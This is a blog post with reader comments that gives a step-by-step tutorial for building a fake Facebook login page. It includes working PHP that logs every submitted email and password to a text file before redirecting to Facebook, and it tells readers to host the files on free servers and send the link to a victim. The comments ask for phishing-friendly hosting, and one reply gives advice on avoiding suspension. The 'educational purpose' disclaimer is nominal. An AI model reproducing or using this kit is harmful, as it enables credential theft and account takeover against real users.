Receive all updates via Facebook. Just Click the Like Button Below

You can also receive Free Email Updates:

How to hack Facebook account with phishing page



Before creating a phishing page, you should first know what is phishing attack. Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging.

Here is a step by step guide will show you how you can make your own Facebook Phishing (Fake) page easily.


How to create a phishing page? 


Step 1 : Create a HTML page looks similar to Facebook homepage.

1. Go to the Facebook page ,and then right click on the page, u will see the option view page source, click on that.


2. Now a new tab will open which contain a source code. Copy and paste the complete code in notepad.


3. Now in that notepad and press CTRL+F,and type action="https:

4. You will have to find a text which looks like this action="https://www.facebook.com/login.php?login_attempt=1"

5. Now delete that part of code and change it to action="login.php" and save it as index.html.

Ex:   action="login.php"



Step 2: Create a PHP file


1. Open a new notepad copy the below code and paste it with name login.php.
<?php
header("Location: http://www.facebook.com/login.php ");
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
} fwrite($handle, "\r\n"); fclose($handle); exit; ?>
Step 3 : Create a empty .txt (notepad) file with name passwords.txt



Now you have three files 1) index.html ,  2) login.php and 3) passwords.txt.

Now here comes the method to get password and email address of the victim :


Now upload these files in any free server like 000webhosting , 1freehosting etc.. And now give the url of that page to your victim. And when your victim try to login in to it with the username and password , the page redirects to Facebook and you will see his email and password which was saved in passwords.txt file.

Or try yourself by installing any server like xampp or wampp server in your PC and run the index.html file via localhost to check it. I have tested the files which works 100%. Look at the below image to check it.


Note :  "Phishing" is identity theft. Attempted identity theft is still a crime. This tutorial is for educational purpose. Do at your own risk.



How to hack Facebook account with phishing page How to hack Facebook account with phishing page Reviewed by Sriram PV on 09:05:00 Rating: 5

14 comments:

  1. nice bro...
    but why my pishing site report by hosting site...plzz give me some hosting sites an support to pishing

    ReplyDelete
  2. www.000webhost.com
    And one more Edit the site therefore it will never get suspended

    Regards
    Chitrangad patil

    www.fb.com/chitrangad.patil.7

    ReplyDelete
  3. i can,t understand how to create password.txt
    how did you find it

    ReplyDelete
    Replies
    1. Open a notepad and then save it as passwords.txt and save it in the same folder

      Delete
  4. after getting copy from view page source how we can open notepad page

    ReplyDelete
  5. Can you elaborate the part "Now upload these files in any free server like 000webhosting , 1freehosting etc.. And now give the url of that page to your victim"
    I have created a 1freehosting account then i followed the instruction that downloading the ftp server and seting up but this isn't working whenever i try to upload the files to the server the ftp server say that the loging unsucessfull.

    ReplyDelete
    Replies
    1. Your Google chrome browser and many servers are very much intelligent to find out the phishing pages. Try the process with any local server which is installed in your computer.

      Delete
  6. what do u open the php file with ?

    ReplyDelete
  7. what do u open the php file with ?

    ReplyDelete
  8. Any help, i have done all the steps ,but i never recieve any passwords at the passwords.txt ?
    In addition my login.php appears as a website icon when i think it should look the same as the one it shows in the 3rd step.

    ReplyDelete
  9. use any ide .or html editer.
    when you save your login.php file then password file will auto save ass php doc

    ReplyDelete
  10. Please send login.php file full

    ReplyDelete

Add your valuable comment here, Share your opinions. Comments for back-links will be deleted without prior intimation. Thank you.

Powered by Blogger.